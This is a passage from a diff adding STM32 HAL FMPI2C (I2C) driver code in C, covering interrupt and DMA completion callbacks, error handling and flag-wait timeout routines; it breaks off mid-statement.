(USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MemTxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MemTxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + else + { + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MasterTxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MasterTxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + } + /* hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX */ + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX) + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + if (hfmpi2c->Mode == HAL_FMPI2C_MODE_MEM) + { + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MemRxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MemRxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + else + { + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MasterRxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MasterRxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + } + else + { + /* Nothing to do */ + } +} + +/** + * @brief FMPI2C Slave complete process. + * @param hfmpi2c FMPI2C handle. + * @param ITFlags Interrupt flags to handle. + * @retval None + */ +static void FMPI2C_ITSlaveCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags) +{ + uint32_t tmpcr1value = READ_REG(hfmpi2c->Instance->CR1); + uint32_t tmpITFlags = ITFlags; + HAL_FMPI2C_StateTypeDef tmpstate = hfmpi2c->State; + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Disable Interrupts and Store Previous state */ + if ((tmpstate == HAL_FMPI2C_STATE_BUSY_TX) || (tmpstate == HAL_FMPI2C_STATE_BUSY_TX_LISTEN)) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_TX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_TX; + } + else if ((tmpstate == HAL_FMPI2C_STATE_BUSY_RX) || (tmpstate == HAL_FMPI2C_STATE_BUSY_RX_LISTEN)) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_RX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_RX; + } + else + { + /* Do nothing */ + } + + /* Disable Address Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + + /* If a DMA is ongoing, Update handle size context */ + if (FMPI2C_CHECK_IT_SOURCE(tmpcr1value, FMPI2C_CR1_TXDMAEN) != RESET) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + if (hfmpi2c->hdmatx != NULL) + { + hfmpi2c->XferCount = (uint16_t)__HAL_DMA_GET_COUNTER(hfmpi2c->hdmatx); + } + } + else if (FMPI2C_CHECK_IT_SOURCE(tmpcr1value, FMPI2C_CR1_RXDMAEN) != RESET) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + if (hfmpi2c->hdmarx != NULL) + { + hfmpi2c->XferCount = (uint16_t)__HAL_DMA_GET_COUNTER(hfmpi2c->hdmarx); + } + } + else + { + /* Do nothing */ + } + + /* Store Last receive data if any */ + if (FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_RXNE) != RESET) + { + /* Remove RXNE flag on temporary variable as read done */ + tmpITFlags &= ~FMPI2C_FLAG_RXNE; + + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + if ((hfmpi2c->XferSize > 0U)) + { + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + } + } + + /* All data are not transferred, so set error code accordingly */ + if (hfmpi2c->XferCount != 0U) + { + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + } + + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + hfmpi2c->XferISR = NULL; + + if (hfmpi2c->ErrorCode != HAL_FMPI2C_ERROR_NONE) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, hfmpi2c->ErrorCode); + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_LISTEN) + { + /* Call FMPI2C Listen complete process */ + FMPI2C_ITListenCplt(hfmpi2c, tmpITFlags); + } + } + else if (hfmpi2c->XferOptions != FMPI2C_NO_OPTION_FRAME) + { + /* Call the Sequential Complete callback, to inform upper layer of the end of Transfer */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->ListenCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_ListenCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + /* Call the corresponding callback to inform upper layer of End of Transfer */ + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX) + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->SlaveRxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_SlaveRxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + else + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->SlaveTxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_SlaveTxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } +} + +/** + * @brief FMPI2C Listen complete process. + * @param hfmpi2c FMPI2C handle. + * @param ITFlags Interrupt flags to handle. + * @retval None + */ +static void FMPI2C_ITListenCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags) +{ + /* Reset handle parameters */ + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + hfmpi2c->XferISR = NULL; + + /* Store Last receive data if any */ + if (FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_RXNE) != RESET) + { + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + if ((hfmpi2c->XferSize > 0U)) + { + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + } + } + + /* Disable all Interrupts*/ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_RX_IT | FMPI2C_XFER_TX_IT); + + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->ListenCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_ListenCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ +} + +/** + * @brief FMPI2C interrupts error process. + * @param hfmpi2c FMPI2C handle. + * @param ErrorCode Error code to handle. + * @retval None + */ +static void FMPI2C_ITError(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ErrorCode) +{ + HAL_FMPI2C_StateTypeDef tmpstate = hfmpi2c->State; + uint32_t tmppreviousstate; + + /* Reset handle parameters */ + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferCount = 0U; + + /* Set new error code */ + hfmpi2c->ErrorCode |= ErrorCode; + + /* Disable Interrupts */ + if ((tmpstate == HAL_FMPI2C_STATE_LISTEN) || + (tmpstate == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) || + (tmpstate == HAL_FMPI2C_STATE_BUSY_RX_LISTEN)) + { + /* Disable all interrupts, except interrupts related to LISTEN state */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT | FMPI2C_XFER_TX_IT); + + /* keep HAL_FMPI2C_STATE_LISTEN if set */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_IT; + } + else + { + /* Disable all interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT | FMPI2C_XFER_RX_IT | FMPI2C_XFER_TX_IT); + + /* If state is an abort treatment on going, don't change state */ + /* This change will be do later */ + if (hfmpi2c->State != HAL_FMPI2C_STATE_ABORT) + { + /* Set HAL_FMPI2C_STATE_READY */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + } + hfmpi2c->XferISR = NULL; + } + + /* Abort DMA TX transfer if any */ + tmppreviousstate = hfmpi2c->PreviousState; + if ((hfmpi2c->hdmatx != NULL) && ((tmppreviousstate == FMPI2C_STATE_MASTER_BUSY_TX) || \ + (tmppreviousstate == FMPI2C_STATE_SLAVE_BUSY_TX))) + { + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_TXDMAEN) == FMPI2C_CR1_TXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + } + + if (HAL_DMA_GetState(hfmpi2c->hdmatx) != HAL_DMA_STATE_READY) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmatx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmatx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hfmpi2c->hdmatx->XferAbortCallback(hfmpi2c->hdmatx); + } + } + else + { + FMPI2C_TreatErrorCallback(hfmpi2c); + } + } + /* Abort DMA RX transfer if any */ + else if ((hfmpi2c->hdmarx != NULL) && ((tmppreviousstate == FMPI2C_STATE_MASTER_BUSY_RX) || \ + (tmppreviousstate == FMPI2C_STATE_SLAVE_BUSY_RX))) + { + if ((hfmpi2c->Instance->CR1 & FMPI2C_CR1_RXDMAEN) == FMPI2C_CR1_RXDMAEN) + { + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + } + + if (HAL_DMA_GetState(hfmpi2c->hdmarx) != HAL_DMA_STATE_READY) + { + /* Set the FMPI2C DMA Abort callback : + will lead to call HAL_FMPI2C_ErrorCallback() at end of DMA abort procedure */ + hfmpi2c->hdmarx->XferAbortCallback = FMPI2C_DMAAbort; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hfmpi2c->hdmarx) != HAL_OK) + { + /* Call Directly hfmpi2c->hdmarx->XferAbortCallback function in case of error */ + hfmpi2c->hdmarx->XferAbortCallback(hfmpi2c->hdmarx); + } + } + else + { + FMPI2C_TreatErrorCallback(hfmpi2c); + } + } + else + { + FMPI2C_TreatErrorCallback(hfmpi2c); + } +} + +/** + * @brief FMPI2C Error callback treatment. + * @param hfmpi2c FMPI2C handle. + * @retval None + */ +static void FMPI2C_TreatErrorCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + if (hfmpi2c->State == HAL_FMPI2C_STATE_ABORT) + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->AbortCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_AbortCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + else + { + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->ErrorCallback(hfmpi2c); +#else + HAL_FMPI2C_ErrorCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } +} + +/** + * @brief FMPI2C Tx data register flush process. + * @param hfmpi2c FMPI2C handle. + * @retval None + */ +static void FMPI2C_Flush_TXDR(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* If a pending TXIS flag is set */ + /* Write a dummy data in TXDR to clear it */ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_TXIS) != RESET) + { + hfmpi2c->Instance->TXDR = 0x00U; + } + + /* Flush TX register if not empty */ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_TXE) == RESET) + { + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_TXE); + } +} + +/** + * @brief DMA FMPI2C master transmit process complete callback. + * @param hdma DMA handle + * @retval None + */ +static void FMPI2C_DMAMasterTransmitCplt(DMA_HandleTypeDef *hdma) +{ + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + /* If last transfer, enable STOP interrupt */ + if (hfmpi2c->XferCount == 0U) + { + /* Enable STOP interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_CPLT_IT); + } + /* else prepare a new DMA transfer and enable TCReload interrupt */ + else + { + /* Update Buffer pointer */ + hfmpi2c->pBuffPtr += hfmpi2c->XferSize; + + /* Set the XferSize to transfer */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + } + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)hfmpi2c->pBuffPtr, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize) != HAL_OK) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_DMA); + } + else + { + /* Enable TC interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RELOAD_IT); + } + } +} + +/** + * @brief DMA FMPI2C slave transmit process complete callback. + * @param hdma DMA handle + * @retval None + */ +static void FMPI2C_DMASlaveTransmitCplt(DMA_HandleTypeDef *hdma) +{ + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + uint32_t tmpoptions = hfmpi2c->XferOptions; + + if ((tmpoptions == FMPI2C_NEXT_FRAME) || (tmpoptions == FMPI2C_FIRST_FRAME)) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + + /* Last Byte is Transmitted */ + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + else + { + /* No specific action, Master fully manage the generation of STOP condition */ + /* Mean that this generation can arrive at any time, at the end or during DMA process */ + /* So STOP condition should be manage through Interrupt treatment */ + } +} + +/** + * @brief DMA FMPI2C master receive process complete callback. + * @param hdma DMA handle + * @retval None + */ +static void FMPI2C_DMAMasterReceiveCplt(DMA_HandleTypeDef *hdma) +{ + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + /* If last transfer, enable STOP interrupt */ + if (hfmpi2c->XferCount == 0U) + { + /* Enable STOP interrupt */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_CPLT_IT); + } + /* else prepare a new DMA transfer and enable TCReload interrupt */ + else + { + /* Update Buffer pointer */ + hfmpi2c->pBuffPtr += hfmpi2c->XferSize; + + /* Set the XferSize to transfer */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + } + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, (uint32_t)hfmpi2c->pBuffPtr, + hfmpi2c->XferSize) != HAL_OK) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_DMA); + } + else + { + /* Enable TC interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RELOAD_IT); + } + } +} + +/** + * @brief DMA FMPI2C slave receive process complete callback. + * @param hdma DMA handle + * @retval None + */ +static void FMPI2C_DMASlaveReceiveCplt(DMA_HandleTypeDef *hdma) +{ + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + uint32_t tmpoptions = hfmpi2c->XferOptions; + + if ((__HAL_DMA_GET_COUNTER(hfmpi2c->hdmarx) == 0U) && \ + (tmpoptions != FMPI2C_NO_OPTION_FRAME)) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + else + { + /* No specific action, Master fully manage the generation of STOP condition */ + /* Mean that this generation can arrive at any time, at the end or during DMA process */ + /* So STOP condition should be manage through Interrupt treatment */ + } +} + +/** + * @brief DMA FMPI2C communication error callback. + * @param hdma DMA handle + * @retval None + */ +static void FMPI2C_DMAError(DMA_HandleTypeDef *hdma) +{ + uint32_t treatdmaerror = 0U; + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + + if (hfmpi2c->hdmatx != NULL) + { + if (__HAL_DMA_GET_COUNTER(hfmpi2c->hdmatx) == 0U) + { + treatdmaerror = 1U; + } + } + + if (hfmpi2c->hdmarx != NULL) + { + if (__HAL_DMA_GET_COUNTER(hfmpi2c->hdmarx) == 0U) + { + treatdmaerror = 1U; + } + } + + /* Check if a FIFO error is detected, if true normal use case, so no specific action to perform */ + if (!((HAL_DMA_GetError(hdma) == HAL_DMA_ERROR_FE)) && (treatdmaerror != 0U)) + { + /* Disable Acknowledge */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_NACK; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_DMA); + } +} + +/** + * @brief DMA FMPI2C communication abort callback + * (To be called at end of DMA Abort procedure). + * @param hdma DMA handle. + * @retval None + */ +static void FMPI2C_DMAAbort(DMA_HandleTypeDef *hdma) +{ + /* Derogation MISRAC2012-Rule-11.5 */ + FMPI2C_HandleTypeDef *hfmpi2c = (FMPI2C_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); + + /* Reset AbortCpltCallback */ + if (hfmpi2c->hdmatx != NULL) + { + hfmpi2c->hdmatx->XferAbortCallback = NULL; + } + if (hfmpi2c->hdmarx != NULL) + { + hfmpi2c->hdmarx->XferAbortCallback = NULL; + } + + FMPI2C_TreatErrorCallback(hfmpi2c); +} + +/** + * @brief This function handles FMPI2C Communication Timeout. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param Flag Specifies the FMPI2C flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_WaitOnFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Flag, FlagStatus Status, + uint32_t Timeout, uint32_t Tickstart) +{ + while (__HAL_FMPI2C_GET_FLAG(hfmpi2c, Flag) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles FMPI2C Communication Timeout for specific usage of TXIS flag. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_WaitOnTXISFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart) +{ + while (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_TXIS) == RESET) + { + /* Check if a NACK is detected */ + if (FMPI2C_IsAcknowledgeFailed(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles FMPI2C Communication Timeout for specific usage of STOP flag. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_WaitOnSTOPFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart) +{ + while (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF) == RESET) + { + /* Check if a NACK is detected */ + if (FMPI2C_IsAcknowledgeFailed(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + return HAL_OK; +} + +/** + * @brief This function handles FMPI2C Communication Timeout for specific usage of RXNE flag. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_WaitOnRXNEFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart) +{ + while (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_RXNE) == RESET) + { + /* Check if a NACK is detected */ + if (FMPI2C_IsAcknowledgeFailed(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check if a STOPF is detected */ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF) == SET) + { + /* Check if an RXNE is pending */ + /* Store Last receive data if any */ + if ((__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_RXNE) == SET) && (hfmpi2c->XferSize > 0U)) + { + /* Return HAL_OK */ + /* The Reading of data from RXDR will be done in caller function */ + return HAL_OK; + } + else + { + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + + /* Check for the Timeout */ + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + return HAL_OK; +} + +/** + * @brief This function handles Acknowledge failed detection during an FMPI2C Communication. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_IsAcknowledgeFailed(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, uint32_t Tickstart) +{ + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_AF) == SET) + { + /* In case of Soft End condition, generate the STOP condition */ + if (FMPI2C_GET_STOP_MODE(hfmpi2c) != FMPI2C_AUTOEND_MODE) + { + /* Generate Stop */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_STOP; + } + /* Wait until STOP Flag is reset */ + /* AutoEnd should be initiate after AF */ + while (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF) == RESET) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_TIMEOUT; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + } + } + + /* Clear NACKF Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + hfmpi2c->State = 